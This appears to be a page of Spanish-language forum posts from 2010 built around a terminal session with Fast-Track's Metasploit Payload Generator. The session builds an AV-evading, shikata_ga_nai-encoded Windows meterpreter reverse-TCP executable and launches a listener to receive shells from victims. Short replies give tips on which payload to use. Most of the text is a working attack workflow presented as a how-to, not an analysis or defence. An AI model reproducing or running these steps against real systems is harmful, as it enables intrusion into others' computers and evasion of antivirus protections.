Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúShell("RmDir()")
Cita de: petro_boca en 23 Enero 2010, 01:11 AMOk, entonces empieza consultado y haz preguntas, pero no digas que te hagamos los codes.
no es ninguna tarea.-
recien hoy empiezo con esto u.u
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c
************************************************************************
Fast-Track Command Line - Where it's OK to finish in under 3 minutes...
************************************************************************
**** MAKE SURE YOU INSTALL ALL THE DEPENDENCIES FIRST (setup.py) ****
Visit http://trac.thepentest.com for tutorials or to file a bug.
1. Update Menu
2. Autopwn Automated
3. MS-SQL Injector
4. MS-SQL Bruter
5. Binary to Hex Payload Generator
6. Mass Client-Side Attack
7. Exploits
8. SQLPwnage
9. Payload Generator
10. Changelog
11. Credits
12. About
Usage: fast-track.py -c <tool#>
shellroot@shellroot-desktop:~/fasttrack$
shellroot@shellroot-desktop:~/fasttrack$ sudo python ./fast-track.py -c 9
#####################################
### ###
### Metasploit Payload Generator ###
### ###
### Written by: Dave Kennedy ###
### aka ReL1K ###
### ###
#####################################
#####################################
The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.
This will also encode your payload to get past most AV and
IDS/IPS.
What payload do you want to generate:
Name: Description:
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
Enter choice (example 1-6): 2
Below is a list of encodings to try and bypass AV.
Select one of the below, Avoid_UTF8_tolower usually gets past them.
1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding
Enter your choice : 2
Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.142.137
Enter the port of the Listener: 1234
Do you want to create an EXE or Shellcode
1. Executable
2. Shellcode
Enter your choice: 1
A payload has been created in this directory and is named 'payload.exe'. Enjoy!
Do you want to start a listener to receive the payload yes or no: yes
Launching Listener...
***********************************************************************************************
Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 192.168.142.137 on Local Port: 1234 Using encoding: ENCODING=shikata_ga_nai
***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Starting the payload handler...
[*] Started reverse handler on port 1234
Cita de: fede_cp en 22 Enero 2010, 01:54 AMesto es lanzado desde linux no??Ajam, más especificamente desde Ubuntu 9.10... : P
Cita de: darkgx en 21 Enero 2010, 23:55 PMPorque cuando se conecta el otro usuario me dice Started Bind handler?Intentad con el PAYLOAD windows/meterpreter/reverse_tcp
y se queda ahi..